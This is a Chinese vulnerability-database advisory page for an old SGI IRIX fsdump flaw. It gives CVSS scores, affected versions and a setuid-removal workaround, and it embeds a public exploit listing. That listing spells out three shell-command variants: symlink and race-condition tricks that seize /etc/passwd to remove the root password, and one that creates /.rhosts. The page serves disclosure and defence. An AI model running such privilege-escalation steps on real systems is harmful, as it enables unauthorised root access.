发布时间 :1996-12-03 00:00:00
修订时间 :2008-09-09 08:33:36

[原文]fsdump command in IRIX allows local users to obtain root access by modifying sensitive files.

[CNNVD]IRIX fsdump命令权限许可和访问控制漏洞(CNNVD-199612-002)


- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:6.0.1SGI IRIX 6.0.1
cpe:/o:sgi:irix:6.2SGI IRIX 6.2
cpe:/o:sgi:irix:5.2SGI IRIX 5.2
cpe:/o:sgi:irix:6.0SGI IRIX 6.0
cpe:/o:sgi:irix:5.3SGI IRIX 5.3
cpe:/o:sgi:irix:5.1.1SGI IRIX 5.1.1
cpe:/o:sgi:irix:5.1SGI IRIX 5.1
cpe:/o:sgi:irix:6.1SGI IRIX 6.1

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  SGI  19970301-01-P

- 漏洞信息

IRIX fsdump命令权限许可和访问控制漏洞
高危 未知
1996-12-03 00:00:00 2005-05-02 00:00:00

- 公告与补丁


- 漏洞信息 (19280)

SGI IRIX <= 6.2 fsdump Vulnerability (EDBID:19280)
irix local
1996-12-03 Verified
0 Jaechul Choe
N/A [点击下载]

A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privlilege. 

Variant 1:
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
(count to three, and hit ctrl-c)
irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
irix% tail -8 /etc/passwd
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null

Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
irix% vi /etc/passwd # remove the encrypted root password
irix% chgrp sys /etc/passwd
irix% chown root /etc/passwd
irix% su -

Variant 2:

cp /etc/passwd /tmp/passwd
ln -s /etc/passwd rfd.lock
/var/rfindd/fsdump -F/tmp/rfd /
/var/rfindd/fsdump -L/etc/passwd -F/tmp/rfd /

Variant 3:
cd /tmp
ln -s /.rhosts fsdump.dir
/var/rfindd/fsdump -Fgimme /
ls -al /.rhosts
rm -f fsdump.dir fsdump.pag gimme


- 漏洞信息

IRIX fsdump File Modification Privilege Escalation
Local Access Required Race Condition
Loss of Integrity Workaround
Exploit Public

- 漏洞描述

IRIX contains a flaw that may allow a malicious local user to overwrite arbitrary files on the system. The issue is due to the fsdump program creating files insecurely. It is possible for a user to use a symlink style attack to manipulate arbitrary files, resulting in a loss of integrity.

- 时间线

1996-11-28 Unknow
1996-11-28 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Remove the setuid bit on the fsdump program or to remove the rfindd subsystem.

- 相关参考

- 漏洞作者